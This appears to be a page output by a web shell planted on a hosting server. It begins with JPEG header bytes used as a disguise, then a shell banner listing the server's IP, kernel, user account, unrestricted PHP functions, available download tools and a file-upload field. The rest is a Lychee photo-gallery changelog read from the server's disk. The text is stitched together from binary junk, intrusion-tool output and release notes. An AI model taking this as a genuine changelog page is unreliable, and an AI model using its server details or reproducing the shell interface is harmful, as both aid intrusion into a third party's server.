����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.143.7.5 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /var/softaculous/lychee/ |
Upload File : |
Version 5.1.2 - Fixes CSP for redirection Latest Released this 24 Jan 21:15 What's Changed Bump dependencies with Vite 5 & prevent some more type errors by @QuentiumYT in #2238 make JS invariant by @ildyria in #2241 Version 5.1.1 - Dropbox, Download buttons & Improved privacy Latest Released this 22 Jan 17:06 This minor version adds the ability to redirect when using old links such as https://lychee.test/#albumID/photoID. To enable this add LEGACY_V4_REDIRECT=true in your .env. What's Changed Bump vite from 4.5.1 to 4.5.2 by @dependabot in #2216 Fix Diagnostics not visible when migrations are pending by @ildyria in #2210 Fix import from Dropbox from Livewire side by @ildyria in #2217 Fix upload on smart albums by @ildyria in #2218 Fix search broken when hitting albums by @ildyria in #2219 Add back Download and full size in photo view. by @ildyria in #2220 Anonymize the paths in the diagnostics by @ildyria in #2226 Fix title not being updated by @ildyria in #2225 Add redirection for legacy links by @ildyria in #2227 Add missing secure header for redirection by @ildyria in #2232 Version 5.1.1 by @ildyria in #2231 v5.0.3 Released on Jan 12, 2024 New settings on APP_URL From this version Lychee v5 supports hosting with sub-folders. Please update your .env as follows: APP_URL must only contain the hostname up to the Top Level Domain (tld) e.g. .com, .org etc. If you are using Lychee in a sub folder, specify the path after the tld here in the APP_DIR constant. For example for https://lychee.test/path/to/lychee: Set APP_URL=https://lychee.test and APP_DIR=/path/to/lychee Do note that We (LycheeOrg) do not recommend the use of APP_DIR. Changes fixes ♯2126 : Cover for upper level album cannot be set - error 500 by @ildyria new ♯2124 : Add clear error message when CSS is not loading by @ildyria fixes ♯2135 : Description should be desc for overlay by @ildyria new ♯2128 : Provide the ability to change the sorting of sub-album per album (Livewire only). by @ildyria fixes ♯2142 : Improved diagnostics with censored URLs by @ildyria fixes ♯2143 and ♯2157 : fix Russian about. by @ildyria fixes ♯2158 : Error displaying enlarged images when accessing a public album without being logged in by @ildyria fixes ♯2161 : Update Readme, add theme repository, optimize ImageMagick by @tinohager fixes ♯2147 : Fix custom.js not being loaded by @ildyria fixes ♯2166 : Fix uploading large number of images fails with 429 by @ildyria fixes ♯2171 : Remove text-neutral for easier configuration of themes by @ildyria new ♯2153 : Add compact view for albums by @ildyria fixes ♯2154 : Fix WebAuthn not working by @ildyria fixes ♯2172 : Fix QR code displaying wrong URL by @ildyria fixes ♯2137 : Fix livewire not working on directory folders by @ildyria new ♯2138 : Allow different aspect ratios for album thumbs (+ per album setting) by @ildyria fixes ♯2181 : Improved diagnostics by @ildyria fixes ♯2186 : Fix double f aperture in sidebar by @ildyria new ♯2179 : Add notify toast when updating user by @ildyria fixes ♯2164 : Fix errors on access rights by @ildyria fixes ♯2178 : Fix back button on unlock page. by @ildyria new ♯2185 : Add left-right for login button + add custom go Home button by @ildyria new ♯2182 : make APP_URL optional again by @ildyria v5.0.2 Released on Dec 28, 2023 Fix SQL injection. See here for more details: GHSA-rjwv-5j3m-p5x4 Changes fixes ♯2116 : Fixes hover (left-right) preventing clicks on volume etc buttons + fix frame button by @ildyria fixes ♯2118 : Fix drag upload bug by @maoxian-1 fixes ♯2123 : Fix SQL Injection by @ildyria